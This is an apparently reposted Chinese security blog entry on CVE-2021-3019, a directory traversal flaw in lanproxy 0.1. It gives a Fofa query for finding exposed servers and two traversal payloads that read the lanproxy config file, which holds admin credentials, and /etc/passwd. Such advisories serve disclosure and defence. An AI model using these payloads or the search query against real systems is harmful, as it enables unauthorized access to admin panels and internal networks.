（CVE-2021-3019）lanproxy 目录遍历漏洞 - 走看看

zoukankan html css js c++ java

（CVE-2021-3019）lanproxy 目录遍历漏洞
漏洞描述

lanproxy是一个将局域网个人电脑、服务器代理到公网的内网穿透工具。攻击者通过构造恶意请求，可直接获取到lanproxy配置文件，从而登录lanproxy管理后台进入内网。

影响版本

lanproxy 0.1

Fofa

header= "Server: LPS-0.1"

漏洞利用

读取配置文件
POC：
```
/../conf/config.properties
```
读取/etc/passwd
```
/../../../../../../../../../../etc/passwd
```
查看全文

相关阅读:
【Docker 命令】- top命令
 笛卡尔的情书
 thinkphp5.0 中使用第三方无命名空间的类库
 配置thinkphp3.2 404页面
 svn取消文件夹关联的方法(svn取消关联)
wamp php.ini 配置的坑
 meta标签中的http-equiv属性使用介绍
 META http-equiv="refresh" 实现网页自动跳转
 关于onclick的执行原理
 redis启动出错Creating Server TCP listening socket 127.0.0.1:6379: bind: No error

原文地址：https://www.cnblogs.com/KHZ521/p/14265850.html

Copyright © 2011-2022 走看看